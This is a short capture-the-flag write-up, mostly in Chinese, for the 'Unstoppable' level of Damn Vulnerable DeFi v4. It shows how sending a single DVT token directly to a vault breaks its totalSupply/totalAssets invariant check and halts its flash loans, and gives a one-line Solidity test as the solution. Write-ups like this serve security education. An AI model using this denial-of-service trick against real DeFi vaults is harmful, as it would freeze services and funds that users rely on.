# Damn Vulnerable DeFi v4 - Unstoppable ## Description https://www.damnvulnerabledefi.xyz/challenges/unstoppable/ There's a tokenized vault with a million DVT tokens deposited. It’s offering flash loans for free, until the grace period ends. To catch any bugs before going 100% permissionless, the developers decided to run a live beta in testnet. There's a monitoring contract to check liveness of the flashloan feature. Starting with 10 DVT tokens in balance, show that it's possible to halt the vault. It must stop offering flash loans. ## Observation 在 `UnstoppableVault.sol` 中，我們主要觀察以下這段程式碼： ```code=sol uint256 balanceBefore = totalAssets(); if (convertToShares(totalSupply) != balanceBefore) revert InvalidBalance(); // enforce ERC4626 requirement ``` 在執行任何 flash loan 之前都會強制檢查 `vault token` 的 `totalSupply` 在經過 `convertToShares()` 轉換後的 `tDVT` 數量是否等於 `underlying token` 的 `totalAssets`。 ## Attack 破壞這個 vault 系統的方法是手動將 DVT token 轉到 vault 裡，讓這個判斷式成立：`(convertToShares(totalSupply) != balanceBefore)` ## Test 在 `Unstoppable.t.sol` 中的測試程式碼： ```code=Solidity function test_unstoppable() public checkSolvedByPlayer { require(token.transfer(address(vault), 1)); } ```